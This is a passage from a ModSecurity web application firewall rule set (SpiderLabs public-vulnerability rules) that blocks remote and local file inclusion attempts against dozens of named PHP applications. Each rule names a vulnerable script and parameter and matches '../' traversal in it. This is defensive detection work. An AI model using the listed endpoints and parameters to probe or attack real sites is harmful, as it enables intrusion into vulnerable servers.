Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009377,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009378,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009379) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter remote file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009379,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009380,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009903,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:forumspath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:forumspath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /rss_importer_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009167,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33698'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sitepath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009382) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion SecRule REQUEST_LINE "@contains /admin/frontpage_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009382,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31959'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:loadadminpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010362) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /install/di.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010362,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:pathtoserverdata/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010198) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/_bot.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010198,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:master[currentskin]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009165) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /LSTable.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009165,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31419'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009195,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mj_config[src_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009196) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009196,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mj_config[src_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003738) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath SecRule REQUEST_LINE "@contains /language/1/splash.lang.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003738,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3909'" SecRule ARGS_NAMES "(?i:languagePath)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009364) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /linkadmin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009364,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34129'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot SecRule REQUEST_LINE "@contains /berylium-classes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003677,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3869'" SecRule ARGS_NAMES "(?i:beryliumroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009417,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_down[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009418,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_top[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_left.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009420,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_left[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009421,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_right[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009422,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009423,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009370) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion SecRule REQUEST_LINE "@contains /HTMLSax3.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009370,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dir[plugins]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion SecRule REQUEST_LINE "@contains /safehtml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009371,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dir[plugins]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php Remote File Inclusion SecRule REQUEST_LINE "@contains /inc/content.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009372,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sIncPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /spaw_control.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009429,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30042'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:spaw_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX SecRule REQUEST_LINE "@contains /mtdialogo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003726,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003727) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX SecRule REQUEST_LINE "@contains /ltdialogo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003727,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003729,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php pathCGX SecRule REQUEST_LINE "@contains /inc/logingecon.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003728,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003737) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir SecRule REQUEST_LINE "@contains /pcltrace.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003737,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3915'" SecRule &TX:'/RFI.*ARGS:g_pcltar_lib_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion SecRule REQUEST_LINE "@contains /install.clickheat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009754,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009755) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1 SecRule REQUEST_LINE "@contains /heatmap/_main.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009755,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE 